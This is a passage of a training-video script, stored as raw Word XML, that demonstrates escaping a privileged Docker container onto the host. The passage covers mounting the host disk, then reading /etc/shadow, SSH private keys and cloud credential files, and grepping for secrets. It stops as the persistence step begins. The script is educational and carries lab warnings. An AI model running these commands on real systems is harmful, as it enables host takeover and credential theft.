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5095def9596f1578beb9238c8b424e79b46b6f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Video 2.2: Host System Compromise from Privileged Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Duration:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">8:00</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Format:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PPT (15%) / Terminal (50%) / Code Editor (25%) / Browser (10%)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Resolution:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1920x1080 @ 30fps</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prerequisites:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Video 2.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="28" w:name="script-begin"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SCRIPT BEGIN</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="opening-context-ppt-slide"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[0:00–0:30] — Opening Context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From Container to Host — Step by Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attack flow diagram:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Privileged Container → Mount Host Disk → Chroot into Host FS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     → Read Credentials → Establish Persistence → Game Over</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NARRATION:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">In this lesson, we’re going to demonstrate a complete host compromise from inside a privileged container. No kernel exploits, no zero-days — just using the access that the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--privileged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flag explicitly grants. Everything I’m about to show you works on any default Docker installation. This is a lab environment — never perform these techniques on systems you don’t own.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ON-SCREEN OVERLAY:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">⚠️ EDUCATIONAL LAB ENVIRONMENT — AUTHORIZED TESTING ONLY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="X0311f2d707f39215ca4e381500fecf3a4e6773b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[0:30–2:00] — Attack Step 1: Mount the Host Filesystem (Terminal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SCREEN:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Terminal at 150% zoom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NARRATION:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Let’s start. I’m an attacker who has gained shell access inside a privileged container.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">COMMAND + EXPLANATION:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Start a privileged container (simulating attacker access)</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--privileged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> alpine sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">I’m now inside a privileged container. First, I need to identify the host’s disk.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Enumerate available block devices</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># fdisk -l 2&gt;/dev/null | grep "Disk /dev"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Disk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/sda: 50 GiB, 53687091200 bytes, 104857600 sectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">fdisk shows me /dev/sda — a 50 GB disk. This is the host’s primary drive. I can see it because</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">--privileged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">gives me access to all device files.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># List partitions</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># fdisk -l /dev/sda</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Device</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">     Boot   Start       End   Sectors  Size Id Type</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/sda1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">       2048  2099199   2097152    1G 83 Linux</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/sda2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">       2099200 104857566 102758367   49G 83 Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Two partitions — sda1 is the boot partition, sda2 is the root filesystem. Let’s mount it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Mount the host's root filesystem</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># mkdir -p /mnt/host</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># mount /dev/sda2 /mnt/host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Mounted. I now have full read-write access to the host’s root filesystem.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verify — read the host's /etc/hostname</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cat /mnt/host/etc/hostname</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">actual-production-host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">There’s the host’s real hostname. I’m reading the host’s filesystem from inside the container.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="Xa856c24d61b954f3044f737c98383813b259825"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2:00–3:15] — Attack Step 2: Credential Harvesting (Terminal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NARRATION:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Now let’s harvest credentials.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Read the shadow file (password hashes)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cat /mnt/host/etc/shadow | head -5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$6$rounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=656000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$salt$hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">...:19400:0:99999:7:::</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">daemon:*:19400:0:99999:7:::</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">syslog:*:19400:0:99999:7:::</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ubuntu:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$6$rounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=656000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$salt$hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">...:19400:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Shadow file — containing password hashes for every user on the host. These can be cracked offline with hashcat or John the Ripper.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Read SSH keys</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cat /mnt/host/root/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cat /mnt/host/home/*/.ssh/id_rsa 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">SSH authorized keys and private keys — if they exist, this gives me remote access to the host and potentially to other systems these keys authenticate to.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Read Docker daemon configuration</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cat /mnt/host/etc/docker/daemon.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">The Docker daemon configuration — I can see if there are additional misconfigurations or credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Search for application credentials</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># grep -r "password\|secret\|api_key\|token" \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/host/etc/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /mnt/host/home/ /mnt/host/opt/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>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rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">A recursive grep for common credential patterns. In real environments, this finds database passwords, API keys, cloud credentials, and more.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Read cloud provider credentials</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cat /mnt/host/home/*/.aws/credentials 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cat /mnt/host/home/*/.config/gcloud/credentials.db 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud credentials — AWS access keys, GCP service account keys. From a single container escape, you can pivot to the entire cloud infrastructure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="Xca17c82d442ea87222c938015d20b54d770471b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3:15–4:45] — Attack Step 3: Establish Persistence (Terminal + Code Editor)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NARRATION:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker doesn’t just want access now — they want to keep it. Let’s establish persistence.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
